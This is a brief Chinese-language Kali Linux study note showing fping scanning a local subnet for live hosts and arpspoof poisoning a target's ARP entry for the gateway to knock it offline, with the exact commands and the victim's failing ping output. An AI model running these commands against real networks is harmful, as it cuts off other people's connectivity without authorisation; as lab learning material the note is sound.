@websec007
2017-05-03T11:00:22.000000Z
字数 382
阅读 2083
kali学习
工具一:fping,网段存活主机发现
工具二:arpspoof,实现arp 网关欺骗攻击,迫使被攻击目标掉线;
# fping -asg 192.168.31.0/24 # 进行网段ping扫描,找出存货主机;
# arpspoof -h
# arpspoof -i eth0 -t 192.168.31.123 192.168.31.1
C:\Users\Administrator>ping 202.102.192.68 -t
正在 Ping 202.102.192.68 具有 32 字节的数据:
请求超时。
请求超时。
请求超时。
请求超时。
请求超时。
202.102.192.68 的 Ping 统计信息:
数据包: 已发送 = 5,已接收 = 0,丢失 = 5 (100% 丢失),
Control-C